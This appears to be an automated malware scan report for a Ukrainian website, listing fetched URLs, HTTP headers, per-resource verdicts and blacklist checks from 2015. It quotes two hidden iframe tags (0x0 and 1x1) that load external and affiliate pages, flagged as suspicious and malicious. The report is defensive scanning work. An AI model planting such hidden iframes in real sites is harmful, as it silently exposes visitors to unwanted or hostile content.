Scanned pages/files
Request | Server response | Status |
http://advokat-ua.at.ua/dir/0-0-1-7-20 | HTTP/1.1 302 Found Cache-Control: private Connection: close Date: Sat, 26 Sep 2015 13:42:07 GMT Location: http://bux-arhiv.ucoz.com/ Server: uServ/3.2.2 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: 2advokat-uauCoz=; path=/; expires=Thu, 26-Sep-2013 13:42:07 GMT; domain=.advokat-ua.at.ua; Set-Cookie: 2advokat-uadrrd=BwCvoAZW; path=/dir; expires=Sun, 25-Sep-2016 13:42:07 GMT; domain=.advokat-ua.at.ua; | clean |
http://bux-arhiv.ucoz.com/ | 200 OK Content-Length: 108135 Content-Type: text/html | clean |
http://s36.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s36.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22097 Content-Type: text/javascript | clean |
http://s36.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://link.links-wm.ru/?id=5140&t=1 | 200 OK Content-Length: 3315 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://web-sar.ru/index.html <iframe src="http://web-sar.ru/index.html" width="0" height="0" frameborder="0">
http://link.links-wm.ru/test404page.js | 404 Not Found Content-Length: 317 Content-Type: text/html | clean |
http://p73608.adskape.ru/adout.js?p=73608&t=8&tx=3&ty=1 | 200 OK Content-Length: 399 Content-Type: text/html | clean |
http://p73608.adskape.ru/adout.php?p=73608&t=8&tx=3&ty=1&sid=' + sid + ref + topfr +' | 200 OK Content-Length: 2533 Content-Type: text/html | clean |
http://p73608.adskape.ru/adclick.php?id=10554&p=73608&tid=101f7b1667b4797e65b816d6a0616b64&tid1=92945c05fb9f6474f67458912e42882c&tid2=3384426&psid=0 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 26 Sep 2015 13:42:11 GMT Location: http://nick.olegarxiya.com/?page_id=2 Server: nginx/1.2.4 Content-Type: text/html Set-Cookie: click[]=10554; expires=Sat, 26-Sep-2015 21:00:00 GMT X-Powered-By: PHP/5.4.7 | clean |
http://nick.olegarxiya.com/?page_id=2 | HTTP/1.1 302 Found Connection: close Date: Sat, 26 Sep 2015 13:42:10 GMT Location: http://nick.olegarxiya.com/cgi-sys/suspendedpage.cgi?page_id=2 Server: Apache Content-Length: 246 Content-Type: text/html; charset=iso-8859-1 | clean |
http://nick.olegarxiya.com/cgi-sys/suspendedpage.cgi?page_id=2 | 200 OK Content-Length: 3639 Content-Type: text/html | clean |
http://p73608.adskape.ru/adclick.php?id=14081&p=73608&tid=101f7b1667b4797e65b816d6a0616b64&tid1=95c78b6e593cb612d7aa29f570c8e890&tid2=3384426&psid=0 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 26 Sep 2015 13:42:12 GMT Location: http://vasiliy777.qwertybiz.com Server: nginx/1.2.4 Content-Type: text/html Set-Cookie: click[]=14081; expires=Sat, 26-Sep-2015 21:00:00 GMT X-Powered-By: PHP/5.4.7 | clean |
http://vasiliy777.qwertybiz.com/ | 200 OK Content-Length: 10058 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://qwertypay.com/rbk.php?aff=vasiliy777 <iframe name="rt" src="http://qwertypay.com/rbk.php?aff=vasiliy777" width="1" height="1" frameborder="0" scrolling="no">
http://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js | 200 OK Content-Length: 93637 Content-Type: text/javascript | clean |
http://qwertybiz.com/templates_new/s1/2/qwertypay_comslider.js | 200 OK Content-Length: 68921 Content-Type: application/x-javascript | clean |
http://qwertypay.com/any/shop_tovar/2/qwertypaycom.js?aff=vasiliy777&line&color=37b39a&blocks=4&width=240 | 200 OK Content-Length: 242 Content-Type: text/html | clean |
http://qwertypay.com/any/buy_buttons/regbut/jswf/swfobject.js | 200 OK Content-Length: 9759 Content-Type: application/x-javascript | clean |
http://cnt.rambler.ru/top100.jcn?1962306 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: advokat-ua.at.ua
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: advokat-ua.at.ua
Referer: http://www.google.com/search?q=advokat-ua.at.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=advokat-ua.at.ua
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://advokat-ua.at.ua/
Result: advokat-ua.at.ua is not infected or malware details are not published yet.